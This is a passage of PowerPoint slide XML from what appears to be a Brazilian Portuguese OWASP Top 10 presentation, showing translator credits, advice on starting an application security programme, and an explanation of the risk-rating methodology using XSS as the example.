                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Luiz Vieira</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Suely Ramalho de Mello</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Jorge Olímpia</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Daniel Quintão</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Mauro Risonho de Paula Assumpção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Marcelo Lopes</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Caio Dias</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1400" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Rodrigo Gularte</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="112713" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="100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pt-BR" sz="1400" noProof="0" dirty="0" smtClean="0"/>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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16055774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4135480269"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="6858000" cy="8275319"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="3918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600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Comece</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Agora</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1100" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>seu Programa de Segurança de Aplicações</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="78834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000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Segurança de Aplicações não é mais opcional. Ataques cada vez mais frequentes e pressão para seguir a regulamentação exigem que as organizações estabeleçam um programa efetivo de segurança das aplicações. Dado o grande número de aplicações e linhas de código que já estão em produção, muitas organizações estão tendo dificuldades em controlar o número elevado de vulnerabilidades. OWASP recomenda que as organizações estabeleçam um programa de segurança de aplicações para ganhar visão e melhorar a segurança dos seus portfolios de aplicações. Obter segurança de aplicações requer que várias partes da organização trabalhem juntas e de maneira eficiente, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>incluindo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> segurança e auditoria, desenvolvimento de software, gerências e liderança executiva. É necessário que a segurança seja visível, para que todos os envolvidos possam entender a postura da organização em relação à segurança de aplicações. É preciso também focalizar em atividades e resultados que realmente ajudem a melhorar a segurança da corporação através da redução do risco com um bom custo/beneficio. Algumas das atividades chave de um programa eficaz para a segurança de aplicações incluem: </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Próximos Passos para Organizações</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2839633669"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2990125"/>
          <a:ext cx="8686800" cy="6096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8119272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994731045"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8153400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Isso é Sobre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Riscos, Não Sobre Vulnerabilidades</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="77724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950" dirty="0" smtClean="0"/>
                        <a:t>Embora as versões do OWASP Top 10 de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>2007</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t> e anteriores, fossem focadas em identificar as "vulnerabilidades" mais comuns, o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t> sempre foi organizado em torno de riscos. Isto tem causado alguma confusão compreensível por parte das pessoas em busca de uma taxonomia estanque de vulnerabilidades. O </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 de 2010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t>, esclareceu o foco de risco no Top 10 por ser muito explícito sobre como agentes de ameaça, vetores de ataque, vulnerabilidades, impactos técnicos e no negócio se combinavam para produzir riscos. Esta versão do OWASP Top 10 segue a mesma metodologia.</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950" baseline="0"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lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t>A metodologia de Classificação de Risco para o Top 10 é baseado no </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t>. Para cada item Top 10, estimou-se o risco típico que cada vulnerabilidade introduz em uma aplicação web típica verificando fatores comuns de probabilidade e fatores de impacto para cada vulnerabilidade comum. Em seguida, classificamos de forma ordenada o Top 10 de acordo com as vulnerabilidades que normalmente apresentam o risco mais significativo para uma aplicação.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="950"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lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t>A </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t> define inúmeros fatores para ajudar a calcular o risco de uma vulnerabilidade identificada. No entanto, o Top 10 deve falar sobre generalidades, ao invés de vulnerabilidades específicas em aplicações reais. Consequentemente, não podemos ser tão exatos quanto os proprietários do sistema podem ser quando calculam os riscos para sua aplicação. Você está melhor equipado para julgar a importância de suas aplicações e dados, quais são seus agentes de ameaça, e como o sistema foi desenvolvido e está sendo operado.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0"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lang="pt-BR" sz="950" dirty="0" smtClean="0"/>
                        <a:t>Nossa metodologia inclui três fatores de probabilidade para cada vulnerabilidade (prevalência, detecção e facilidade de exploração) e um fator de impacto (impacto técnico). A prevalência de uma vulnerabilidade é um fator que normalmente você não tem que calcular. Para os dados de prevalência, foram fornecidas estatísticas a partir de um certo número de diferentes organizações (como referenciado na seção Agradecimentos na página 3) e temos uma média de seus dados em conjunto para chegar a uma lista Top 10 da probabilidade de existência por prevalência. Estes dados foram então combinados com os dois outros fatores de probabilidade (detecção e facilidade de exploração) para calcular uma classificação de probabilidade para cada vulnerabilidade. Este valor foi então multiplicado pelo nosso impacto técnico médio estimado para cada item para chegar a uma classificação de risco global do Top 10.</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95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sz="950" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Observe que esta abordagem não leva em conta a probabilidade do agente de ameaça. Nem responde por qualquer um dos vários detalhes técnicos associados à sua aplicação específica. Qualquer um desses fatores poderia afetar significativamente a probabilidade global de um atacante encontrar e explorar uma vulnerabilidade particular. Esta classificação também não leva em conta o impacto real sobre o seu negócio. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Sua organização</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="950" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> terá de decidir qual o grau de risco de segurança das aplicações está disposta a aceitar dada a sua cultura, indústria e ambiente regulatório. O objetivo do OWASP Top 10 não é fazer a análise de risco para você.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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95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sz="950" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>A figura seguinte ilustra o nosso cálculo do risco para A3: Cross-Site Scripting, como um exemplo. XSS é tão comum que justifica o único "muito difundido", valor 0 de prevalência. Todos os outros riscos variaram de generalizada a rara (valor de 1 a 3).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+R</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924637026"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="117862" y="6259288"/>
          <a:ext cx="6629400" cy="2808512"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="598712">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a:p>
                  </a:txBody>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4572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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MUITO DIFUNDIDA</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FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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61160">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
